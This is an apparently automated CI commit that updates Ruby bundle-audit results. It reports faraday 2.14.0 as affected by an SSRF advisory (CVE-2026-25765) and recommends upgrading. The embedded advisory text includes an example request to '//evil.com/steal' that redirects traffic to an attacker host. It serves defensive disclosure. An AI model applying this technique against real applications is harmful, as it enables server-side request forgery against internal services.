From 93693ffd181cc2b921c93a12611c71758cc4dd62 Mon Sep 17 00:00:00 2001
From: cicd
Date: Thu, 12 Feb 2026 08:49:23 +0100
Subject: [PATCH] commit by to_remotes 2026-02-12 08:49:23 +0100 from cicd
---
 bundle-audit-time.txt | 2 +-
 bundle-audit.json | 2 +-
 report.txt | 11 ++++++++++-
 update-info.txt | 14 ++++++++++----
 4 files changed, 22 insertions(+), 7 deletions(-)
diff --git a/bundle-audit-time.txt b/bundle-audit-time.txt
index 7a700a2f..481f9cbf 100644
--- a/bundle-audit-time.txt
+++ b/bundle-audit-time.txt
@@ -1 +1 @@
-2026-02-11T14:00:03+01:00
+2026-02-12T08:49:23+01:00
diff --git a/bundle-audit.json b/bundle-audit.json
index 06959e71..ac8a68fd 100644
--- a/bundle-audit.json
+++ b/bundle-audit.json
@@ -1 +1 @@
-{"version":"0.9.3","created_at":"2026-02-11 14:00:02 +0100","results":[]}
\ No newline at end of file
+{"version":"0.9.3","created_at":"2026-02-12 08:49:23 +0100","results":[{"type":"unpatched_gem","gem":{"name":"faraday","version":"2.14.0"},"advisory":{"path":"/home/wiseadvice/.local/share/ruby-advisory-db/gems/faraday/CVE-2026-25765.yml","id":"CVE-2026-25765","url":"https://github.com/lostisland/faraday/security/advisories/GHSA-33mh-2634-fwr2","title":"Faraday affected by SSRF via protocol-relative URL host override in build_exclusive_url","date":"2026-02-09","description":"### Impact\n\nFaraday's `build_exclusive_url` method (in `lib/faraday/connection.rb`)\nuses Ruby's `URI#merge` to combine the connection's base URL with\na user-supplied path. Per RFC 3986, protocol-relative URLs\n(e.g. `//evil.com/path`) are treated as network-path references\nthat override the base URL's host/authority component.\n\nThis means that if any application passes user-controlled input to\nFaraday's `get()`, `post()`, `build_url()`, or other request\nmethods, an attacker can supply a protocol-relative URL like\n`//attacker.com/endpoint` to redirect the request to an\narbitrary host, enabling Server-Side Request Forgery (SSRF).\n\nThe `./` prefix guard added in v2.9.2 (PR #1569) explicitly exempts\nURLs starting with `/`, so protocol-relative URLs bypass it entirely.\n\n**Example**\n```ruby\nconn = Faraday.new(url: 'https://api.internal.com')\nconn.get('//evil.com/steal')\n# Request is sent to https://evil.com/steal instead of api.internal.com\n```\n\n### Patches\n\nFaraday v2.14.1 is patched against this security issue. All\nversions of Faraday up to 2.14.0 are affected.\n\n### Workarounds\n\n**NOTE: Upgrading to Faraday v2.14.1+ is the recommended action\nto mitigate this issue, however should that not be an option\nplease continue reading.**\n\nApplications should validate and sanitize any user-controlled\ninput before passing it to Faraday request methods.\nSpecifically:\n\n- Reject or strip input that starts with // followed by a\n non-/ character.\n- Use an allowlist of permitted path prefixes.\n- Alternatively, prepend ./ to all user-supplied paths before\n passing them to Faraday.\n\nExample validation:\n```ruby\ndef safe_path(user_input)\n raise ArgumentError, \"Invalid path\" if user_input.match?(r{\\A//[^/]})\n user_input\nend\n```\n","cvss_v2":null,"cvss_v3":5.8,"cve":"2026-25765","osvdb":null,"ghsa":"33mh-2634-fwr2","unaffected_versions":[],"patched_versions":[">= 2.14.1"],"criticality":"medium"}}]}
\ No newline at end of file
diff --git a/report.txt b/report.txt
index 8900c02c..d92b90bb 100644
--- a/report.txt
+++ b/report.txt
@@ -1 +1,10 @@
-No vulnerabilities found
+Name: faraday
+Version: 2.14.0
+CVE: CVE-2026-25765
+GHSA: GHSA-33mh-2634-fwr2
+Criticality: Medium
+URL: https://github.com/lostisland/faraday/security/advisories/GHSA-33mh-2634-fwr2
+Title: Faraday affected by SSRF via protocol-relative URL host override in build_exclusive_url
+Solution: update to '>= 2.14.1'
+
+Vulnerabilities found!
diff --git a/update-info.txt b/update-info.txt
index d8821ac2..20df6d91 100644
--- a/update-info.txt
+++ b/update-info.txt
@@ -1,7 +1,13 @@
 Updating ruby-advisory-db ...
-Already up to date.
+Updating 1886fa5..826ac19
+Fast-forward
+ gems/bitcoinrb/GHSA-q66h-m87m-j2q6.yml | 45 ++++++++++++++++++++
+ gems/faraday/CVE-2026-25765.yml | 75 ++++++++++++++++++++++++++++++++++
+ 2 files changed, 120 insertions(+)
+ create mode 100644 gems/bitcoinrb/GHSA-q66h-m87m-j2q6.yml
+ create mode 100644 gems/faraday/CVE-2026-25765.yml
 Updated ruby-advisory-db
 ruby-advisory-db:
- advisories: 1056 advisories
- last updated: 2026-02-07 16:42:05 -0800
- commit: 1886fa514d2ebe25d6146a1f1c786ac533d51d57
+ advisories: 1058 advisories
+ last updated: 2026-02-11 11:24:37 -0800
+ commit: 826ac198fe00af14343d839de644e74bf7d94d84